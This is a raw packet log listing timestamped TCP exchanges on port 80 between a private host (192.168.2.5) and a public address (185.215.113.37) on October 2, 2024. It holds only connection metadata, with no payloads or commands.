Oct 2, 2024 23:10:04.897556067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.897569895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.897597075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.897609949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.915030956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.915117979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.915211916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.915227890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.915268898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.915280104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.915554047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.915568113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.915580988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.915595055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.915611029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.915627956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.915657043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.946043968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946110010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.946116924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946134090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946160078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.946173906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.946516991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946531057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946544886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946559906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946564913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.946578026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.946584940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.946610928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.946631908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.947374105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.947442055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.947572947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.947618008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.947633982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.947652102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.947665930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.947685003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.947701931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.947736025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.948242903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.948278904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.948307037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.948312998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.948318958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.948347092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.948363066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.948396921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.948971987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949004889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949033976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949037075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949049950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949069977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949084044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949103117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949120045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949152946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949767113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949800014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949821949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949851036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949871063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949884892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949908018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949913979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.949928999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.949965000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.950575113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.950608969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.950630903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.950637102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.950649977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.950670004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.950689077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.950701952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.950722933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.950733900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.950747967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.950782061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.951433897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.951467037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.951492071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.951498985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.951514006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.951533079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.951548100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.951564074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.951581955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.951616049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.952220917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.952254057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.952275038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.952286959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.952296972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.952320099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.952337027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.952368975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953010082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953042984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953064919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953074932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953108072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953110933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953119993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953145027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953170061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953191042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953804016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953836918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953859091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953870058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953879118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953902006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953917027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953931093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.953952074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.953979969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.954559088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.954591036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.954613924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.954623938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.954632998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.954655886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.954677105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.954688072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.954705954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.954737902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.955418110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.955454111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.955475092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.955486059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.955492973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.955518961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.955535889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.955566883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.956360102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.956393003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.956419945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.956423998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.956437111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.956458092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.956474066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.956490040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.956507921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.956540108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.957271099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.957303047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.957326889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.957334995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.957344055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.957367897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.957382917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.957400084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.957417011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.957448959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.957781076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.957813978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.957837105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.957861900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.979197025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.979243040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.979298115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.979299068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.979334116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.979336023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.979336023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.979367018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.979389906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.979433060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.979438066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.979475975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.979484081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.979521990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980120897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980154991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980179071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980187893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980196953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980221987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980232954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980267048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980705023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980736017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980767012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980767965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980775118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980801105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.980811119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.980844975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.981431007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.981463909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.981492996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.981494904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.981502056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.981528044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.981539011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.981559038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.981575966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.981605053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.982251883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.982284069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.982302904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.982316017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.982327938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.982348919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.982358932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.982392073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.983100891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.983139038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.983170986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.983182907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.983187914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.983218908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.983220100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.983253956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.983270884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.983942986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.983975887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.983994961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.984006882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.984015942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.984039068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.984050989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.984081984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.984760046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.984796047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.984831095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.984843969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.989097118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.989129066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.989147902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.989161968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.989173889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.989206076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.989459038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.989490986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.989507914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.989525080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.989533901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.989564896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.989829063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.989875078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.032921076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033020020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033037901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033075094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033090115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033159971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033634901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033683062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033695936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033718109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033726931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033756971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033766031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033792019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033802032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033826113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033837080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033859015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033871889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033895969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.033905983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.033940077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.034604073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.034636021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.034667969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.034699917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.034744978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.034782887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.035437107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.035470009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.035499096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.035501003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.035516024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.035533905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.035543919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.035566092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.035578966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.035608053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.036211014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.036243916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.036266088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.036274910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.036308050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.036308050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.036314011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.036340952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.036350965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.036382914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.036994934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037028074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037049055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037060022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037072897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037095070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037105083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037127018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037137032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037169933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037790060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037823915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037844896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037857056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037868977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037893057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037900925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037925959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.037939072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.037970066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.038758039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.038790941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.038815022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.038824081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.038834095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.038857937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.038870096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.038891077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.038903952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.038935900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.039784908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.039819002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.039839983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.039850950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.039860964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.039884090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.039895058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.039927006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.040458918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.040492058 CEST	80	49704	185.215.113.37	192.168.2.5
